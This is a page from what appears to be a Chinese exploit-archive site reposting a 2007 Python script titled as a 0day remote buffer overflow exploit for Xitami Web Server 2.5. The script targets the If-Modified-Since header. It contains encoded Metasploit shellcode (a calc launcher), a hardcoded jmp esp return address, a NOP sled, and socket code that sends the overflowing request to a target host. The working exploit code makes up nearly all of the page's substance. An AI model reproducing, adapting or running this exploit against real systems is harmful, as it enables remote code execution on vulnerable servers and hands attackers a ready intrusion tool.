首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Xitami Web Server 2.5 (If-Modified-Since) Remote BoF Exploit (0day) 来源：h07@interia.pl 作者：Krystian 发布时间：2007-09-25   #!/usr/bin/python # Xitami Web Server 2.5 (If-Modified-Since) 0day Remote Buffer Overflow Exploit # Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl> # Tested on: Xitami 2.5c2 / XP SP2 Polish # Shellcode: Windows Execute Command (calc) <metasploit.com> # Details:.. # #     [Module xigui32.exe] #     If-Modified-Since: Evil, ["A" * 76]\r\n #     EIP 41414141 # #     [Module xitami.exe] #     If-Modified-Since: Evil, ["A" * 104]\r\n #     EIP 41414141 # # Product Homepage: http://www.xitami.com/ # Just for fun  ;) ## from struct import pack from time import sleep from socket import * host = "192.168.0.1" port = 80 shellcode = ( "\x6a\x22\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8d\x6c\xf6" "\xb2\x83\xeb\xfc\xe2\xf4\x71\x84\xb2\xb2\x8d\x6c\x7d\xf7\xb1\xe7" "\x8a\xb7\xf5\x6d\x19\x39\xc2\x74\x7d\xed\xad\x6d\x1d\xfb\x06\x58" "\x7d\xb3\x63\x5d\x36\x2b\x21\xe8\x36\xc6\x8a\xad\x3c\xbf\x8c\xae" "\x1d\x46\xb6\x38\xd2\xb6\xf8\x89\x7d\xed\xa9\x6d\x1d\xd4\x06\x60" "\xbd\x39\xd2\x70\xf7\x59\x06\x70\x7d\xb3\x66\xe5\xaa\x96\x89\xaf" "\xc7\x72\xe9\xe7\xb6\x82\x08\xac\x8e\xbe\x06\x2c\xfa\x39\xfd\x70" "\x5b\x39\xe5\x64\x1d\xbb\x06\xec\x46\xb2\x8d\x6c\x7d\xda\xb1\x33" "\xc7\x44\xed\x3a\x7f\x4a\x0e\xac\x8d\xe2\xe5\x9c\x7c\xb6\xd2\x04" "\x6e\x4c\x07\x62\xa1\x4d\x6a\x0f\x97\xde\xee\x6c\xf6\xb2") opcode = pack("<L", 0x7CA76981) # jmp esp (shell32.dll / XP SP2 Polish) jmpcode = "\xeb\x22"            # jmp short +0x22 buf = "A" * 72                  # (76 - 4) xigui32.exe buf += opcode buf += jmpcode buf += "\x90" * 128 buf += shellcode header = ( 'GET / HTTP/1.1\r\n' 'Host: %s\r\n' 'If-Modified-Since: Evil, %s\r\n' '\r\n') % (host, buf) s = socket(AF_INET, SOCK_STREAM) s.connect((host, port)) s.send(header) sleep(1) s.close() print "DONE" # EoF   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·EasyMail MessagePrinter Object ·AskJeeves Toolbar 4.0.2.53 act ·Lighttpd <= 1.4.17 FastCGI Hea ·EB Design Pty Ltd (EBCRYPT.DLL ·IMail iaspam.dll 8.0x Remote H ·Motorola Timbuktu Pro 8.6.3 Ar ·Flip <= 3.0 Remote Password Ha ·Flip <= 3.0 Remoe Admin Creati ·Linux Kernel 2.4/2.6 x86-64 Sy ·OneCMS 2.4 (userreviews.php ab ·Zomplog <= 3.8.1 upload_files. ·Sun jre1.6.0_X isInstalled.dns   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved